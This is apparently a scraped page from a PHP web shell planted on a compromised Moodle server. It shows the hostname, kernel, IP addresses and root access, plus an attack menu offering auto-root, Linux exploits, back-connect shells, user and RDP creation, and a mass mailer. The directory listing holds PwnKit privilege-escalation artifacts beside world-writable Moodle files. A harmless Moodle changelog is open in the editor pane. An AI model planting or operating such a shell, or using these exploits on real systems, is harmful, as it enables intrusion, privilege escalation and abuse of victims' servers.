Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
enrol /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
authorize
[ DIR ]
drwxrwxrwx
category
[ DIR ]
drwxrwxrwx
cohort
[ DIR ]
drwxrwxrwx
database
[ DIR ]
drwxrwxrwx
flatfile
[ DIR ]
drwxrwxrwx
guest
[ DIR ]
drwxrwxrwx
imsenterprise
[ DIR ]
drwxrwxrwx
ldap
[ DIR ]
drwxrwxrwx
manual
[ DIR ]
drwxrwxrwx
meta
[ DIR ]
drwxrwxrwx
mnet
[ DIR ]
drwxrwxrwx
paypal
[ DIR ]
drwxrwxrwx
self
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
yui
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
README.txt
245
B
-rwxrwxrwx
ajax.php
5.28
KB
-rwxrwxrwx
bulkchange.php
3.37
KB
-rwxrwxrwx
bulkchange_forms.php
4.39
KB
-rwxrwxrwx
editenrolment.php
3.72
KB
-rwxrwxrwx
editenrolment_form.php
2.79
KB
-rwxrwxrwx
externallib.php
44.9
KB
-rwxrwxrwx
index.php
3.16
KB
-rwxrwxrwx
instances.php
9.5
KB
-rwxrwxrwx
locallib.php
51.11
KB
-rwxrwxrwx
otherusers.php
3.54
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
renderer.php
27.81
KB
-rwxrwxrwx
unenroluser.php
3.23
KB
-rwxrwxrwx
upgrade.txt
1.27
KB
-rwxrwxrwx
users.php
9.7
KB
-rwxrwxrwx
users_forms.php
6
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upgrade.txt
This files describes API changes in /enrol/* - plugins, information provided here is intended especially for developers. === 2.5 === * plugins may use general enrol/editenrolment.php page to let users edit enrolments manually * new support for grade recovery in enrol_plugin::enrol_user() method === 2.4 === required changes in code: * use role_get_name() or role_fix_names() if you need any role names, using role.name directly from database is not correct any more * new restore support: ENROL_RESTORE_EXACT, ENROL_RESTORE_NOUSERS and ENROL_RESTORE_CLASS were removed, implement new restore_* plugin methods instead other changes and new features: * course enrolment manager now works with disabled plugins too * new support for protected group membership linked to enrol instance * new support for expiry notifications - see enrol_plugin::send_expiry_notifications() method === 2.2 === required changes in code: * load_temp_role() is deprecated, use load_temp_course_role() instead, temp role not loaded * remove_temp_role() is deprecated, use remove_temp_course_roles() instead * 'user_unenrol_modified' event was renamed to 'user_enrol_modified' === 2.0 === required changes in code: * enrolment plugins need to be rewritten to use new API - see inline phpdocs and official plugins
Close